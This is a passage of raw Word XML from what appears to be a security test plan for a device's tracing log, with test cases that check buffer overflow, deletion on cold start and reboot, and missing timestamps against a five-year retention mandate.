    <w:p w14:paraId="10D10373" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282A2420" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCD48A7" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659E6CC4" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133E9E8C" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A365C6" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76BA2F49" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA19EDA" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A87C4F9" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A16066" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FC88E5" w14:textId="77777777" w:rsidR="00D90833" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D620F36" w14:textId="77777777" w:rsidR="00D90833" w:rsidRPr="00DA402C" w:rsidRDefault="00D90833" w:rsidP="00547898">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B67E2DC" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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7CD0233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BBDF0F" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A68EE6E"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268FE3B4"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791F4009"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3EE89CB2"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2722B8" w14:paraId="06F135F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7E3EAEB" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1818BC1D" w14:textId="77777777" w:rsidR="00CF2964"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F2964">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Capacity/overflow: generate &gt;100 loggable events; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB80F9D" w14:textId="01125BA9" w:rsidR="00900880" w:rsidRPr="007F5798"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F2964">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm oldest entries overwritten (fixed buffer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793BD67E" w14:textId="7D881D1F" w:rsidR="00900880" w:rsidRPr="007F5798" w:rsidRDefault="0074177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4177F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07A0A586" w14:textId="5FF5E762" w:rsidR="00900880" w:rsidRPr="007F5798" w:rsidRDefault="00A416AD" w:rsidP="00A416A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416AD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2 (log review); OWASP ISTG-DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FAC1FF" w14:textId="558447C9" w:rsidR="00900880" w:rsidRPr="007F5798" w:rsidRDefault="00DB2D5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SVV-</w:t>
            </w:r>
            <w:r w:rsidR="008403A3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00655E3F" w14:paraId="01770B0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AF4460" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C9224F1" w14:textId="77777777" w:rsidR="008D65FB"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D65FB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cold-start deletion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3300E90C" w14:textId="77777777" w:rsidR="008D65FB"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D65FB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">populate the log, cold-start, confirm cleared; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DF114F" w14:textId="6DA02038" w:rsidR="00900880" w:rsidRPr="00D258C9"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D65FB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>optionally check EC3/EC4 recovery as exploratory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA7D60D" w14:textId="608F994A" w:rsidR="00900880" w:rsidRPr="00D258C9" w:rsidRDefault="007556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5563E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DCB55BD" w14:textId="4A74EC68" w:rsidR="00A3132A" w:rsidRPr="00A3132A" w:rsidRDefault="00F64D11" w:rsidP="00A3132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64D11">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2 / §7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA50329" w14:textId="69C0B03D" w:rsidR="00900880" w:rsidRPr="00D258C9" w:rsidRDefault="00DB2D53"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w:t>
            </w:r>
            <w:r w:rsidR="000E2CEE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="008403A3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="0040244F" w14:paraId="64CD808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EEE9176" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314F431F" w14:textId="0B31A69B" w:rsidR="00900880" w:rsidRPr="00D0764E" w:rsidRDefault="004A5A83" w:rsidP="004A5A8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A5A83">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mandated-reboot retention check: simulate the annual reboot interval (SRIO-1812) and confirm the log does not survive the device's own required maintenance reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48CEC6BD" w14:textId="19787DE6" w:rsidR="00900880" w:rsidRPr="00D0764E" w:rsidRDefault="00095047" w:rsidP="0048628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95047">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1 is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00095047">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>structural</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FAB2FA1" w14:textId="457EA3A7" w:rsidR="00900880" w:rsidRPr="00D0764E" w:rsidRDefault="0072085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2085B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based + documentation review (SRIO-1812)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254F0DB4" w14:textId="34DB07C3" w:rsidR="00900880" w:rsidRPr="00D0764E" w:rsidRDefault="000E2CE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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00234486" w14:paraId="63D791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AC91948" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDBAF41" w14:textId="399FFDEB" w:rsidR="00900880" w:rsidRPr="00035F89" w:rsidRDefault="009C363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C3635">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Time-attribution: confirm no absolute timestamp on any retained entry, so a 5-year window cannot be bounded (reuse TC-RQ003-04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39DF311F" w14:textId="7D0D105C" w:rsidR="00900880" w:rsidRPr="00035F89" w:rsidRDefault="00C103B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103B8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2 compound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426C4A4D" w14:textId="39BA865B" w:rsidR="00900880" w:rsidRPr="00463F4C" w:rsidRDefault="00463F4C" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463F4C">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6B5638" w14:textId="4D0DA39A" w:rsidR="00900880" w:rsidRPr="00035F89" w:rsidRDefault="00051AD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w:t>
            </w:r>
            <w:r w:rsidR="008403A3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B76DA61" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A48785" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07EFA959" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="16"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="16"/>
      <w:r w:rsidR="00D1751D">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="16"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286DE80" w14:textId="77777777" w:rsidR="00AE338E" w:rsidRDefault="00AE338E" w:rsidP="00133045">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5E0F0E" w14:textId="022AD3B8" w:rsidR="00133045" w:rsidRPr="00DB074F" w:rsidRDefault="00133045" w:rsidP="00AE338E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E57282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ012-01 </w:t>
      </w:r>
      <w:r w:rsidR="00AE338E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E57282">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Circular-Buffer Overflow / Capacity Conflict </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DC4C0" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00530E8C">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530E8C" w14:paraId="663994E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11E712" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66DA77FA" w14:textId="77777777" w:rsidR="00530E8C"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530E8C" w14:paraId="685E86D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113429" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110ADA1F" w14:textId="1C89C3FC" w:rsidR="00530E8C" w:rsidRPr="00EC056D" w:rsidRDefault="009746B5" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="5097"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009746B5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ012-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00AB1D3A" w14:paraId="46B04EB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D67CD0F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="623281F4" w14:textId="523C233A" w:rsidR="00530E8C" w:rsidRPr="00AB1D3A" w:rsidRDefault="00B350DA" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B350DA">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>RQ-012  → CR 2.9 / CR 2.10 → Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00D67CA6" w14:paraId="5DC21CD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C9DECF" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F759AD7" w14:textId="68F8C039" w:rsidR="00530E8C" w:rsidRPr="00EC056D" w:rsidRDefault="0018169B" w:rsidP="0018169B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="4549"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0018169B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w14:paraId="0BC0CCB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AD881B9" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF58373" w14:textId="6E0D65D6" w:rsidR="00530E8C" w:rsidRPr="00EC056D" w:rsidRDefault="00A846FB"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846FB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2 (Threat-Mitigation Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="499C218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7943B7" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D27C423" w14:textId="7E213A19" w:rsidR="00530E8C" w:rsidRPr="00EC056D" w:rsidRDefault="007025A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025A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the tracing log is a fixed-capacity circular buffer that overwrites the oldest entries once full, so intervention data is not retained for any duration bounded by event volume</w:t>
            </w:r>
            <w:r w:rsidR="00F67F2F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="007025A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> conflicting with the 5-year mandate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="4F89097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5BFBF7F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="289650D5" w14:textId="77777777" w:rsidR="00B72848" w:rsidRDefault="001C696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C696E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Read and record the current log. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21EE8D98" w14:textId="77777777" w:rsidR="00B72848" w:rsidRDefault="001C696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C696E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Generate a controlled series of &gt;N loggable events (N = documented capacity, ≥100), each individually identifiable. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4CAD4C" w14:textId="77777777" w:rsidR="006F4F4E" w:rsidRDefault="001C696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C696E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Read the log after each block. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C81182C" w14:textId="1D1DCCF6" w:rsidR="00530E8C" w:rsidRPr="00EC056D" w:rsidRDefault="001C696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C696E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Confirm the earliest events are overwritten and the buffer never exceeds its fixed size.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530E8C" w:rsidRPr="00EE7A74" w14:paraId="7B97E98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3C8D31" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
